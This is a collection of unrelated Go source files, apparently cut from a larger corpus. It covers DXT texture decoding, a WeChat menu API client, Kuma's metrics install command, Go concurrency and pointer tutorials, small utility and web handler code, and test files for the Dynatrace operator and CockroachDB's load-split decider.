			if c0 > c1 {
				dst[i].setToMix3(p1, p0)
			} else {
				black(&dst[i])
			}
		}
		// Advance to the next pixel's 2-bit code.
		codes >>= 2
	}
}
// decodeColorDXT3_5 decodes the color half of a DXT3/DXT5 block. Unlike
// DXT1, the four codes always mean: endpoint 0, endpoint 1, and the two
// 2/3–1/3 interpolations; alpha is handled by a separate alpha block.
func decodeColorDXT3_5(r binary.Reader, dst []pixel) {
	c0, c1, codes := r.Uint16(), r.Uint16(), r.Uint32()
	p0, p1 := expand565(int(c0)), expand565(int(c1))
	for i := 0; i < 16; i++ {
		switch codes & 0x3 {
		case 0:
			dst[i].setColorFrom(p0)
		case 1:
			dst[i].setColorFrom(p1)
		case 2:
			dst[i].setToMix3(p0, p1)
		case 3:
			dst[i].setToMix3(p1, p0)
		}
		codes >>= 2
	}
}
// decodeAlphaDXT3 reads DXT3's explicit alpha block: 16 four-bit alpha
// values. Multiplying by 0x11 expands 4 bits to 8 (0xf -> 0xff).
func decodeAlphaDXT3(r binary.Reader, dst []pixel) {
	a := r.Uint64()
	for i := 0; i < 16; i++ {
		dst[i].a = int(a&0xf) * 0x11
		a >>= 4
	}
}
// decodeAlphaDXT5 reads DXT5's interpolated alpha block: two 8-bit alpha
// endpoints followed by 48 bits of 3-bit per-pixel codes (assembled here
// from a Uint16 plus a Uint32).
func decodeAlphaDXT5(r binary.Reader, dst []pixel) {
	a0, a1, codes := int(r.Uint8()), int(r.Uint8()), uint64(r.Uint16())|(uint64(r.Uint32())<<16)
	for i := 0; i < 16; i++ {
		dst[i].a = mixAlphaDXT5(a0, a1, codes)
		codes >>= 3
	}
}
// mixAlphaDXT5 resolves one DXT5 3-bit alpha code against the two
// endpoints. Codes 0 and 1 select the endpoints directly. When a0 > a1
// the remaining six codes interpolate in sevenths; otherwise four codes
// interpolate in fifths and codes 6/7 are the constants 0 and 255.
func mixAlphaDXT5(a0, a1 int, code uint64) int {
	c := int(code & 0x7)
	switch c {
	case 0:
		return a0
	case 1:
		return a1
	}
	if a0 > a1 {
		return (a0*(8-c) + a1*(c-1)) / 7
	}
	switch c {
	case 6:
		return 0
	case 7:
		return 255
	}
	return (a0*(6-c) + a1*(c-1)) / 5
}
// copyToDest writes a decoded 4x4 pixel block into the RGBA byte buffer at
// pixel position (x, y). The loop bounds clamp against width/height so
// partial edge blocks of non-multiple-of-4 images do not write out of
// range.
func copyToDest(block []pixel, dst []byte, x, y, width, height int) {
	// o is the byte offset of the block's top-left pixel (4 bytes/pixel).
	o := 4 * (y*width + x)
	for dy := 0; dy < 4 && y+dy < height; dy++ {
		i, p := o, dy*4
		for dx := 0; dx < 4 && x+dx < width; dx++ {
			dst[i+0] = sint.Byte(block[p].r)
			dst[i+1] = sint.Byte(block[p].g)
			dst[i+2] = sint.Byte(block[p].b)
			dst[i+3] = sint.Byte(block[p].a)
			i += 4
			p++
		}
		// Advance one full image row.
		o += 4 * width
	}
}
|
package generator
// simpleStruct is the text/template used to render one Go struct per
// table, with a db tag for each column. Its data context must provide
// Package, Imports and Tables, plus the ToCamel template function.
const simpleStruct = `package {{.Package}}
{{if .Imports}}
import (
{{range $import := .Imports}}	"{{$import}}"
{{end}})
{{end}}{{range .Tables -}}
// Table {{.Table.User}}.{{.Table.Table}}
type {{.Table.Table | ToCamel}} struct {
{{range $column := .Columns}}	{{$column.Name | ToCamel}} {{$column.Type}} ` + "`" + `db:"{{$column.Name}}"` + "`" + ` // type: {{$column.Origin}}
{{end}}}
{{end}}
`
|
package menu
import (
"WeChat-golang/mp/core"
"WeChat-golang/mp/menu/createMenu"
"WeChat-golang/mp/menu/getMenu"
"fmt"
)
// Create installs a one-button custom menu via the WeChat official-account
// API (a single "click"-type button).
func Create(clt core.Client) (err error) {
	// https://developers.weixin.qq.com/doc/offiaccount/Custom_Menus/Creating_Custom-Defined_Menu.html
	_, err = clt.PostJson("/cgi-bin/menu/create",
		nil,
		&createMenu.PostBody{
			Button: []createMenu.Button{
				{
					Type: "click",
					Name: "今日歌曲",
					Key:  "V1001_TODAY_MUSIC",
				},
			},
		},
		nil,
	)
	return
}
// Get queries the current custom menu configuration and prints the
// top-level buttons.
func Get(clt core.Client) (err error) {
	//https://developers.weixin.qq.com/doc/offiaccount/Custom_Menus/Querying_Custom_Menus.html
	resp := new(getMenu.Response)
	_, err = clt.GetJson("/cgi-bin/get_current_selfmenu_info",
		nil,
		resp,
	)
	// NOTE(review): resp is printed even when err is non-nil (zero value);
	// confirm that is intended.
	fmt.Println(resp.SelfMenuInfo.Button)
	return
}
|
package install
import (
"strings"
kumactl_cmd "github.com/kumahq/kuma/app/kumactl/pkg/cmd"
"github.com/pkg/errors"
"github.com/spf13/cobra"
"github.com/kumahq/kuma/app/kumactl/pkg/install/data"
"github.com/kumahq/kuma/app/kumactl/pkg/install/k8s"
"github.com/kumahq/kuma/app/kumactl/pkg/install/k8s/metrics"
kuma_version "github.com/kumahq/kuma/pkg/version"
)
// metricsTemplateArgs is the template context used to render the metrics
// (Prometheus + Grafana) installation manifests.
type metricsTemplateArgs struct {
	Namespace                 string
	Mesh                      string
	KumaPrometheusSdImage     string
	KumaPrometheusSdVersion   string
	KumaCpAddress             string
	WithoutPrometheus         bool
	WithoutGrafana            bool
	DashboardDataplane        string
	DashboardMesh             string
	DashboardServiceToService string
	DashboardCP               string
}
var DefaultMetricsTemplateArgs = metricsTemplateArgs{
Namespace: "kuma-metrics",
KumaPrometheusSdImage: "kong-docker-kuma-docker.bintray.io/kuma-prometheus-sd",
KumaPrometheusSdVersion: kuma_version.Build.Version,
KumaCpAddress: "grpc://kuma-control-plane.kuma-system:5676",
WithoutPrometheus: false,
WithoutGrafana: false,
}
// newInstallMetrics builds the `kumactl install metrics` cobra command, which
// renders the Prometheus + Grafana Kubernetes resources to stdout.
//
// IMPROVEMENT: the four copy-pasted dashboard-loading blocks are folded into
// a single data-driven loop, so adding a dashboard is a one-line change.
func newInstallMetrics(pctx *kumactl_cmd.RootContext) *cobra.Command {
	args := DefaultMetricsTemplateArgs
	cmd := &cobra.Command{
		Use:   "metrics",
		Short: "Install Metrics backend in Kubernetes cluster (Prometheus + Grafana)",
		Long:  `Install Metrics backend in Kubernetes cluster (Prometheus + Grafana) in a kuma-metrics namespace`,
		RunE: func(cmd *cobra.Command, _ []string) error {
			args.Mesh = pctx.Args.Mesh
			templateFiles, err := data.ReadFiles(metrics.Templates)
			if err != nil {
				return errors.Wrap(err, "Failed to read template files")
			}
			yamlTemplateFiles := templateFiles.Filter(func(file data.File) bool {
				return strings.HasSuffix(file.Name, ".yaml")
			})
			// Load each Grafana dashboard JSON into its template argument.
			dashboards := []struct {
				path   string
				target *string
			}{
				{"/grafana/kuma-dataplane.json", &args.DashboardDataplane},
				{"/grafana/kuma-mesh.json", &args.DashboardMesh},
				{"/grafana/kuma-service-to-service.json", &args.DashboardServiceToService},
				{"/grafana/kuma-cp.json", &args.DashboardCP},
			}
			for _, d := range dashboards {
				dashboard, err := data.ReadFile(metrics.Templates, d.path)
				if err != nil {
					return err
				}
				*d.target = dashboard.String()
			}
			// Drop Prometheus/Grafana resources when the user opted out.
			filter := getExcludePrefixesFilter(args.WithoutPrometheus, args.WithoutGrafana)
			renderedFiles, err := renderFilesWithFilter(yamlTemplateFiles, args, simpleTemplateRenderer, filter)
			if err != nil {
				return errors.Wrap(err, "Failed to render template files")
			}
			// Sort so namespaces/CRDs apply before the resources that need them.
			sortedResources, err := k8s.SortResourcesByKind(renderedFiles)
			if err != nil {
				return errors.Wrap(err, "Failed to sort resources by kind")
			}
			singleFile := data.JoinYAML(sortedResources)
			if _, err := cmd.OutOrStdout().Write(singleFile.Data); err != nil {
				return errors.Wrap(err, "Failed to output rendered resources")
			}
			return nil
		},
	}
	cmd.Flags().StringVar(&args.Namespace, "namespace", args.Namespace, "namespace to install metrics to")
	cmd.Flags().StringVar(&args.KumaPrometheusSdImage, "kuma-prometheus-sd-image", args.KumaPrometheusSdImage, "image name of Kuma Prometheus SD")
	cmd.Flags().StringVar(&args.KumaPrometheusSdVersion, "kuma-prometheus-sd-version", args.KumaPrometheusSdVersion, "version of Kuma Prometheus SD")
	cmd.Flags().StringVar(&args.KumaCpAddress, "kuma-cp-address", args.KumaCpAddress, "the address of Kuma CP")
	cmd.Flags().BoolVar(&args.WithoutPrometheus, "without-prometheus", args.WithoutPrometheus, "disable Prometheus resources generation")
	cmd.Flags().BoolVar(&args.WithoutGrafana, "without-grafana", args.WithoutGrafana, "disable Grafana resources generation")
	return cmd
}
// getExcludePrefixesFilter builds the path-prefix exclusion filter applied to
// rendered templates: /prometheus and/or /grafana resources can be skipped.
func getExcludePrefixesFilter(withoutPrometheus, withoutGrafana bool) ExcludePrefixesFilter {
	excluded := make([]string, 0, 2)
	if withoutPrometheus {
		excluded = append(excluded, "/prometheus")
	}
	if withoutGrafana {
		excluded = append(excluded, "/grafana")
	}
	return ExcludePrefixesFilter{Prefixes: excluded}
}
|
// 152. Mutex 互斥鎖 lock 防止兩條執行緒同時對同一公共資源進行讀寫的 防止搶輸出
// https://golang.org/pkg/sync/#Mutex
// https://golang.org/pkg/sync/#RWMutex 讀/寫
// Gosched()圖
// https://studygolang.com/articles/3028
// 鎖住直到編輯結束 其他人才能用
// 在cmd執行時 使用 go run -race main.go
// ide上 goroutines: 3 還是會跑出 cmd 執行不會 Why?
//func Gosched()
//Gosched产生处理器,从而允许其他goroutine运行。 它不会暫停当前的goroutine,因此执行会自动恢复。
package main
import (
"fmt"
"runtime"
"sync"
)
// main demonstrates protecting a shared counter with sync.Mutex: 100
// goroutines each read, yield, increment and write back; the lock keeps the
// read-modify-write atomic so the final count is always 100.
func main() {
	fmt.Println("cpus:", runtime.NumCPU())
	fmt.Println("goroutines", runtime.NumGoroutine())

	counter := 0
	const gs = 100 // number of goroutines to launch

	var wg sync.WaitGroup
	var mu sync.Mutex
	wg.Add(gs)

	for i := 0; i < gs; i++ {
		go func() {
			defer wg.Done()
			mu.Lock()
			defer mu.Unlock()
			v := counter
			// Yield so another goroutine may run between the read and the
			// write; the mutex still makes the whole update atomic.
			runtime.Gosched()
			v++
			counter = v
		}() // note the trailing parentheses — the closure must be invoked
		fmt.Println("*goroutines:", runtime.NumGoroutine())
	}

	wg.Wait() // block until every goroutine has called Done
	fmt.Println("goroutines", runtime.NumGoroutine())
	fmt.Println("counter", counter)
}
|
package main
import "fmt"
// person is a small demo struct used to illustrate pointer semantics.
type person struct {
	name string // first name
	age int // age in years
}
// main demonstrates struct pointers: taking the address of a composite
// literal, printing the pointer and its fields, and Go's automatic
// dereference for field access through a pointer.
func main() {
	james := &person{"James", 20} // composite literal address: *person
	fmt.Println(james)            // &{James 20} — pointer, but values shown
	fmt.Println(&james)           // address of the pointer variable itself
	fmt.Printf("%T\n", james)     // *main.person
	// Field access auto-dereferences: james.name is (*james).name.
	fmt.Println(james.name) // James
	fmt.Println(james.age)  // 20
}
|
package status
import (
"fmt"
"testing"
dynatracev1beta1 "github.com/Dynatrace/dynatrace-operator/src/api/v1beta1"
"github.com/Dynatrace/dynatrace-operator/src/dtclient"
"github.com/Dynatrace/dynatrace-operator/src/kubesystem"
"github.com/Dynatrace/dynatrace-operator/src/scheme/fake"
"github.com/stretchr/testify/assert"
v1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
)
// Fixture values shared by the status tests below.
const (
	testUUID            = "test-uuid"
	testHost            = "test-host"
	testPort            = uint32(1234)
	testProtocol        = "test-protocol"
	testAnotherHost     = "test-another-host"
	testAnotherPort     = uint32(5678)
	testAnotherProtocol = "test-another-protocol"
	testError           = "test-error"
	testVersion         = "1.217.12345-678910"
	testVersionPaas     = "2.217.12345-678910"
)
// TestStatusOptions is a compile-time check that the Options struct exposes
// the DtClient and ApiReader fields the status updater depends on.
func TestStatusOptions(t *testing.T) {
	// Checks if StatusOptions struct and its properties exists
	_ = Options{
		DtClient:  &dtclient.MockDynatraceClient{},
		ApiReader: fake.NewClient(),
	}
}
func TestSetDynakubeStatus(t *testing.T) {
t.Run(`set status`, func(t *testing.T) {
instance := &dynatracev1beta1.DynaKube{}
dtc := &dtclient.MockDynatraceClient{}
clt := fake.NewClient(&v1.Namespace{
ObjectMeta: metav1.ObjectMeta{
Name: kubesystem.Namespace,
UID: testUUID,
},
})
options := Options{
DtClient: dtc,
ApiReader: clt,
}
dtc.On("GetCommunicationHostForClient").Return(dtclient.CommunicationHost{
Protocol: testProtocol,
Host: testHost,
Port: testPort,
}, nil)
dtc.On("GetOneAgentConnectionInfo").Return(dtclient.OneAgentConnectionInfo{
CommunicationHosts: []dtclient.CommunicationHost{
{
Protocol: testProtocol,
Host: testHost,
Port: testPort,
},
{
Protocol: testAnotherProtocol,
Host: testAnotherHost,
Port: testAnotherPort,
},
},
ConnectionInfo: dtclient.ConnectionInfo{
TenantUUID: testUUID,
},
}, nil)
dtc.On("GetLatestAgentVersion", dtclient.OsUnix, dtclient.InstallerTypeDefault).Return(testVersion, nil)
dtc.On("GetLatestAgentVersion", dtclient.OsUnix, dtclient.InstallerTypePaaS).Return(testVersionPaas, nil)
err := SetDynakubeStatus(instance, options)
assert.NoError(t, err)
assert.Equal(t, testUUID, instance.Status.KubeSystemUUID)
assert.NotNil(t, instance.Status.CommunicationHostForClient)
assert.Equal(t, testHost, instance.Status.CommunicationHostForClient.Host)
assert.Equal(t, testPort, instance.Status.CommunicationHostForClient.Port)
assert.Equal(t, testProtocol, instance.Status.CommunicationHostForClient.Protocol)
assert.NotNil(t, instance.Status.ConnectionInfo)
assert.Equal(t, testUUID, instance.Status.ConnectionInfo.TenantUUID)
assert.NotNil(t, instance.Status.ConnectionInfo.CommunicationHosts)
assert.Equal(t, []dynatracev1beta1.CommunicationHostStatus{
{
Protocol: testProtocol,
Host: testHost,
Port: testPort,
},
{
Protocol: testAnotherProtocol,
Host: testAnotherHost,
Port: testAnotherPort,
},
}, instance.Status.ConnectionInfo.CommunicationHosts)
assert.NotNil(t, instance.Status.LatestAgentVersionUnixDefault)
assert.Equal(t, testVersion, instance.Status.LatestAgentVersionUnixDefault)
assert.Equal(t, testVersionPaas, instance.Status.LatestAgentVersionUnixPaas)
})
t.Run(`error querying kube system uid`, func(t *testing.T) {
instance := &dynatracev1beta1.DynaKube{}
dtc := &dtclient.MockDynatraceClient{}
clt := fake.NewClient()
options := Options{
DtClient: dtc,
ApiReader: clt,
}
err := SetDynakubeStatus(instance, options)
assert.EqualError(t, err, "namespaces \"kube-system\" not found")
})
t.Run(`error querying communication host for client`, func(t *testing.T) {
instance := &dynatracev1beta1.DynaKube{}
dtc := &dtclient.MockDynatraceClient{}
clt := fake.NewClient(&v1.Namespace{
ObjectMeta: metav1.ObjectMeta{
Name: kubesystem.Namespace,
UID: testUUID,
},
})
options := Options{
DtClient: dtc,
ApiReader: clt,
}
dtc.On("GetCommunicationHostForClient").Return(dtclient.CommunicationHost{}, fmt.Errorf(testError))
err := SetDynakubeStatus(instance, options)
assert.EqualError(t, err, testError)
})
t.Run(`error querying connection info`, func(t *testing.T) {
instance := &dynatracev1beta1.DynaKube{}
dtc := &dtclient.MockDynatraceClient{}
clt := fake.NewClient(&v1.Namespace{
ObjectMeta: metav1.ObjectMeta{
Name: kubesystem.Namespace,
UID: testUUID,
},
})
options := Options{
DtClient: dtc,
ApiReader: clt,
}
dtc.On("GetCommunicationHostForClient").Return(dtclient.CommunicationHost{
Protocol: testProtocol,
Host: testHost,
Port: testPort,
}, nil)
dtc.On("GetOneAgentConnectionInfo").Return(dtclient.OneAgentConnectionInfo{}, fmt.Errorf(testError))
err := SetDynakubeStatus(instance, options)
assert.EqualError(t, err, testError)
})
t.Run(`error querying latest agent version for unix / default`, func(t *testing.T) {
instance := &dynatracev1beta1.DynaKube{}
dtc := &dtclient.MockDynatraceClient{}
clt := fake.NewClient(&v1.Namespace{
ObjectMeta: metav1.ObjectMeta{
Name: kubesystem.Namespace,
UID: testUUID,
},
})
options := Options{
DtClient: dtc,
ApiReader: clt,
}
dtc.On("GetCommunicationHostForClient").Return(dtclient.CommunicationHost{
Protocol: testProtocol,
Host: testHost,
Port: testPort,
}, nil)
dtc.On("GetOneAgentConnectionInfo").Return(dtclient.OneAgentConnectionInfo{
CommunicationHosts: []dtclient.CommunicationHost{
{
Protocol: testProtocol,
Host: testHost,
Port: testPort,
},
{
Protocol: testAnotherProtocol,
Host: testAnotherHost,
Port: testAnotherPort,
},
},
ConnectionInfo: dtclient.ConnectionInfo{
TenantUUID: testUUID,
},
}, nil)
dtc.On("GetLatestAgentVersion", dtclient.OsUnix, dtclient.InstallerTypeDefault).Return("", fmt.Errorf(testError))
err := SetDynakubeStatus(instance, options)
assert.EqualError(t, err, testError)
})
t.Run(`error querying latest agent version for unix / paas`, func(t *testing.T) {
instance := &dynatracev1beta1.DynaKube{}
dtc := &dtclient.MockDynatraceClient{}
clt := fake.NewClient(&v1.Namespace{
ObjectMeta: metav1.ObjectMeta{
Name: kubesystem.Namespace,
UID: testUUID,
},
})
options := Options{
DtClient: dtc,
ApiReader: clt,
}
dtc.On("GetCommunicationHostForClient").Return(dtclient.CommunicationHost{
Protocol: testProtocol,
Host: testHost,
Port: testPort,
}, nil)
dtc.On("GetOneAgentConnectionInfo").Return(dtclient.OneAgentConnectionInfo{
CommunicationHosts: []dtclient.CommunicationHost{
{
Protocol: testProtocol,
Host: testHost,
Port: testPort,
},
{
Protocol: testAnotherProtocol,
Host: testAnotherHost,
Port: testAnotherPort,
},
},
ConnectionInfo: dtclient.ConnectionInfo{
TenantUUID: testUUID,
},
}, nil)
dtc.On("GetLatestAgentVersion", dtclient.OsUnix, dtclient.InstallerTypeDefault).Return(testVersion, nil)
dtc.On("GetLatestAgentVersion", dtclient.OsUnix, dtclient.InstallerTypePaaS).Return("", fmt.Errorf(testError))
err := SetDynakubeStatus(instance, options)
assert.EqualError(t, err, testError)
})
}
|
// Copyright 2014 The btcbot Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// https://github.com/philsong/
// Author:Phil 78623269@qq.com
package util
import (
"fmt"
"logger"
"math"
"math/rand"
"os"
"strconv"
"time"
)
// MIN is the user-defined tolerance for float comparisons.
const MIN = 0.000001

// IsEqual reports whether f1 and f2 are equal to within MIN.
//
// BUG FIX: the original used math.Dim(f1, f2), which is max(f1-f2, 0) and
// therefore returned true for ANY pair with f1 <= f2 (e.g. IsEqual(1, 100)
// was true). A tolerance comparison needs the symmetric absolute difference.
func IsEqual(f1, f2 float64) bool {
	return math.Abs(f1-f2) < MIN
}
func AddRecord(record, filename string) {
file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE|os.O_APPEND, 0777)
if err != nil {
return
}
defer file.Close()
file.WriteString(fmt.Sprintf("%s\n", record))
}
// RandomString returns a string of l random decimal digits.
//
// FIXES: the original reseeded the GLOBAL rand source on every call (an
// anti-pattern that degrades randomness for other users of math/rand and can
// repeat output for rapid calls) and built the result with quadratic string
// concatenation. A private source and a byte buffer avoid both.
func RandomString(l int) string {
	rng := rand.New(rand.NewSource(time.Now().UnixNano()))
	buf := make([]byte, l)
	for i := range buf {
		buf[i] = '0' + byte(rng.Intn(10))
	}
	return string(buf)
}
// randdigit returns one random ASCII digit ('0'-'9') drawn from the global
// math/rand source.
func randdigit() uint8 {
	const digits = "0123456789"
	return digits[rand.Intn(len(digits))]
}
// IntegerToString formats value as its base-10 decimal representation.
func IntegerToString(value int64) (s string) {
	return strconv.FormatInt(value, 10)
}
// StringToInteger parses s as a base-10 int64, returning 0 when s is not a
// valid integer.
func StringToInteger(s string) (value int64) {
	parsed, err := strconv.ParseInt(s, 10, 64)
	if err != nil {
		return 0
	}
	return parsed
}
// FloatToString formats value with the minimal number of digits needed to
// round-trip it exactly ('f' format, precision -1).
func FloatToString(value float64) (s string) {
	return strconv.FormatFloat(value, 'f', -1, 64)
}
// StringToFloat parses in as a float64, logging (not crashing, despite the
// message) on failure. Note: strconv.ParseFloat returns the nearest
// representable value alongside a range error (e.g. ±Inf for overflow), and
// that value — not necessarily 0 — is what gets returned here.
func StringToFloat(in string) float64 {
	out, err := strconv.ParseFloat(in, 64)
	if err != nil {
		logger.Errorln("don't know the type, crash!", in)
	}
	return out
}
// InterfaceToFloat64 coerces iv to a float64. Supported inputs: a float64
// (returned unchanged) or a numeric string (parsed). Any other type — or an
// unparseable string — logs an error and yields 0.
func InterfaceToFloat64(iv interface{}) (retV float64) {
	switch ivTo := iv.(type) {
	case float64:
		retV = ivTo
	case string:
		{
			var err error
			retV, err = strconv.ParseFloat(ivTo, 64)
			if err != nil {
				// Unparseable string: report and fall back to 0.
				logger.Errorln("convert failed, crash!")
				return 0
			}
		}
	default:
		// Unsupported dynamic type: log the value and fall back to 0.
		logger.Errorln(ivTo)
		logger.Errorln("don't know the type, crash!")
		return 0
	}
	return retV
}
func Exist(filename string) bool {
_, err := os.Stat(filename)
return err == nil || os.IsExist(err)
}
func DeleteFile(filepath string) {
if Exist(filepath) {
os.Remove(filepath)
}
}
|
package Controller
import (
"1/Model"
_struct "1/struct"
"github.com/gin-gonic/gin"
"net/http"
"strconv"
)
// ShowComment returns the comment list for the video identified by the "vid"
// query parameter as JSON. A malformed id or a lookup failure answers
// HTTP 400 with the error text.
func ShowComment(c *gin.Context) {
	intid, err := strconv.Atoi(c.Query("vid"))
	if err != nil {
		c.String(http.StatusBadRequest, "Error:%s", err.Error())
		return
	}
	var comments []_struct.Comment
	err, comments = Model.ShowComment(intid)
	if err != nil {
		c.String(http.StatusBadRequest, "Error:%s", err.Error())
		return
	}
	c.JSON(200, comments)
}
|
package response
import "MCS_Server/model"
// AccountWithToken is the login response payload: the embedded base account
// fields plus the issued session token.
type AccountWithToken struct {
	model.BaseAccount
	Token string `json:"token"`
}
|
package main
import "fmt"
import "math"
// minSquaredCost returns the minimum, over integer candidate points c in
// [0, 100), of the sum of squared distances (c-x)^2 for every x in arr.
// For an empty slice the cost is 0.
//
// NOTE(review): the original scanned only candidates 0..99, which assumes
// every input value is below 100 (likely a problem constraint) — that bound
// is preserved here; confirm against the problem statement before widening.
//
// IMPROVEMENT: the search was extracted from main into a pure, testable
// helper, and math.Pow(z, 2) replaced with z*z (identical result, no call).
func minSquaredCost(arr []int) float64 {
	minCost := math.Inf(0)
	for c := 0; c < 100; c++ {
		cost := 0.0
		for _, x := range arr {
			d := float64(c - x)
			cost += d * d
		}
		if cost < minCost {
			minCost = cost
		}
	}
	return minCost
}

// main reads n followed by n integers from stdin and prints the minimal
// total squared distance to the best integer meeting point.
func main() {
	var n int
	fmt.Scan(&n)
	arr := make([]int, n)
	for i := range arr {
		fmt.Scan(&arr[i])
	}
	fmt.Println(minSquaredCost(arr))
}
|
// Copyright 2019 The Cockroach Authors.
//
// Use of this software is governed by the Business Source License
// included in the file licenses/BSL.txt.
//
// As of the Change Date specified in that file, in accordance with
// the Business Source License, use of this software will be governed
// by the Apache License, Version 2.0, included in the file
// licenses/APL.txt.
package split
import (
"math"
"math/rand"
"testing"
"time"
"github.com/cockroachdb/cockroach/pkg/keys"
"github.com/cockroachdb/cockroach/pkg/roachpb"
"github.com/cockroachdb/cockroach/pkg/util/encoding"
"github.com/cockroachdb/cockroach/pkg/util/leaktest"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
// TestDecider walks a Decider through its lifecycle: QPS rollover accounting,
// engaging the split finder once sustained QPS exceeds the threshold (10),
// split-key suggestion and its throttling via minSplitSuggestionInterval,
// decay of the suggestion when load drops, non-splittable single-key load,
// finder re-sampling under a changed workload, and Reset.
func TestDecider(t *testing.T) {
	defer leaktest.AfterTest(t)()
	// Deterministic RNG so finder sampling is reproducible.
	intn := rand.New(rand.NewSource(12)).Intn
	var d Decider
	Init(&d, intn, func() float64 { return 10.0 })
	// ms(i) is a fixed epoch plus i milliseconds.
	ms := func(i int) time.Time {
		ts, err := time.Parse(time.RFC3339, "2000-01-01T00:00:00Z")
		assert.NoError(t, err)
		return ts.Add(time.Duration(i) * time.Millisecond)
	}
	// op(s) builds a span factory hitting the single key s.
	op := func(s string) func() roachpb.Span {
		return func() roachpb.Span { return roachpb.Span{Key: roachpb.Key(s)} }
	}
	assertQPS := func(i int, expQPS float64) {
		t.Helper()
		qps := d.LastQPS(ms(i))
		assert.Equal(t, expQPS, qps)
	}
	assert.Equal(t, false, d.Record(ms(100), 1, nil))
	assertQPS(100, 0)
	// The first operation was interpreted as having happened after an eternity
	// of no activity, and rolled over the qps to mark the beginning of a new
	// second. The next qps computation is expected for timestamps >= 1100.
	assert.Equal(t, ms(100), d.mu.lastQPSRollover)
	assert.EqualValues(t, 0, d.mu.count)
	assert.Equal(t, false, d.Record(ms(400), 4, nil))
	assertQPS(100, 0)
	assertQPS(700, 0)
	assert.Equal(t, false, d.Record(ms(300), 3, nil))
	assertQPS(100, 0)
	assert.Equal(t, false, d.Record(ms(900), 1, nil))
	assertQPS(0, 0)
	assert.Equal(t, false, d.Record(ms(1099), 1, nil))
	assertQPS(0, 0)
	// Now 9 operations happened in the interval [100, 1099]. The next higher
	// timestamp will decide whether to engage the split finder.
	// It won't engage because the duration between the rollovers is 1.1s, and
	// we had 10 events over that interval.
	assert.Equal(t, false, d.Record(ms(1200), 1, nil))
	assertQPS(0, float64(10)/float64(1.1))
	assert.Equal(t, ms(1200), d.mu.lastQPSRollover)
	var nilFinder *Finder
	assert.Equal(t, nilFinder, d.mu.splitFinder)
	assert.Equal(t, false, d.Record(ms(2199), 12, nil))
	assert.Equal(t, nilFinder, d.mu.splitFinder)
	// 2200 is the next rollover point, and 12+1=13 qps should be computed.
	assert.Equal(t, false, d.Record(ms(2200), 1, op("a")))
	assert.Equal(t, ms(2200), d.mu.lastQPSRollover)
	assertQPS(0, float64(13))
	assert.NotNil(t, d.mu.splitFinder)
	assert.False(t, d.mu.splitFinder.Ready(ms(10)))
	// With continued partitioned write load, split finder eventually tells us
	// to split. We don't test the details of exactly when that happens because
	// this is done in the finder tests.
	tick := 2200
	for o := op("a"); !d.Record(ms(tick), 11, o); tick += 1000 {
		if tick/1000%2 == 0 {
			o = op("z")
		} else {
			o = op("a")
		}
	}
	assert.Equal(t, roachpb.Key("z"), d.MaybeSplitKey(ms(tick)))
	// We were told to split, but won't be told to split again for some time
	// to avoid busy-looping on split attempts.
	for i := 0; i <= int(minSplitSuggestionInterval/time.Second); i++ {
		o := op("z")
		if i%2 != 0 {
			o = op("a")
		}
		assert.False(t, d.Record(ms(tick), 11, o))
		assert.True(t, d.LastQPS(ms(tick)) > 1.0)
		// Even though the split key remains.
		assert.Equal(t, roachpb.Key("z"), d.MaybeSplitKey(ms(tick+999)))
		tick += 1000
	}
	// But after minSplitSuggestionInterval of ticks, we get another one.
	assert.True(t, d.Record(ms(tick), 11, op("a")))
	assert.True(t, d.LastQPS(ms(tick)) > 1.0)
	// Split key suggestion vanishes once qps drops.
	tick += 1000
	assert.False(t, d.Record(ms(tick), 9, op("a")))
	assert.Equal(t, roachpb.Key(nil), d.MaybeSplitKey(ms(tick)))
	assert.Equal(t, nilFinder, d.mu.splitFinder)
	// Hammer a key with writes above threshold. There shouldn't be a split
	// since everyone is hitting the same key and load can't be balanced.
	for i := 0; i < 1000; i++ {
		assert.False(t, d.Record(ms(tick), 11, op("q")))
		tick += 1000
	}
	assert.True(t, d.mu.splitFinder.Ready(ms(tick)))
	assert.Equal(t, roachpb.Key(nil), d.MaybeSplitKey(ms(tick)))
	// But the finder keeps sampling to adapt to changing workload...
	for i := 0; i < 1000; i++ {
		assert.False(t, d.Record(ms(tick), 11, op("p")))
		tick += 1000
	}
	// ... which we verify by looking at its samples directly.
	for _, sample := range d.mu.splitFinder.samples {
		assert.Equal(t, roachpb.Key("p"), sample.key)
	}
	// Since the new workload is also not partitionable, nothing changes in
	// the decision.
	assert.True(t, d.mu.splitFinder.Ready(ms(tick)))
	assert.Equal(t, roachpb.Key(nil), d.MaybeSplitKey(ms(tick)))
	// Get the decider engaged again so that we can test Reset().
	for i := 0; i < 1000; i++ {
		o := op("z")
		if i%2 != 0 {
			o = op("a")
		}
		d.Record(ms(tick), 11, o)
		tick += 500
	}
	// The finder wants to split, until Reset is called, at which point it starts
	// back up at zero.
	assert.True(t, d.mu.splitFinder.Ready(ms(tick)))
	assert.Equal(t, roachpb.Key("z"), d.MaybeSplitKey(ms(tick)))
	d.Reset()
	assert.Nil(t, d.MaybeSplitKey(ms(tick)))
	assert.Nil(t, d.mu.splitFinder)
}
// TestDeciderCallsEnsureSafeSplitKey checks that a suggested split key is
// routed through keys.EnsureSafeSplitKey: when load alternates between two
// column-family keys of the same row prefix, the suggested key must be the
// truncated row boundary, not the raw sampled family key.
func TestDeciderCallsEnsureSafeSplitKey(t *testing.T) {
	defer leaktest.AfterTest(t)()
	intn := rand.New(rand.NewSource(11)).Intn
	var d Decider
	Init(&d, intn, func() float64 { return 1.0 })
	// Build a valid SQL table key with several uvarint components.
	baseKey := keys.SystemSQLCodec.TablePrefix(51)
	for i := 0; i < 4; i++ {
		baseKey = encoding.EncodeUvarintAscending(baseKey, uint64(52+i))
	}
	c0 := func() roachpb.Span { return roachpb.Span{Key: append([]byte(nil), keys.MakeFamilyKey(baseKey, 1)...)} }
	c1 := func() roachpb.Span { return roachpb.Span{Key: append([]byte(nil), keys.MakeFamilyKey(baseKey, 9)...)} }
	expK, err := keys.EnsureSafeSplitKey(c1().Key)
	require.NoError(t, err)
	var k roachpb.Key
	var now time.Time
	// Alternate load on the two family keys until a split key is suggested.
	for i := 0; i < 2*int(minSplitSuggestionInterval/time.Second); i++ {
		now = now.Add(500 * time.Millisecond)
		d.Record(now, 1, c0)
		now = now.Add(500 * time.Millisecond)
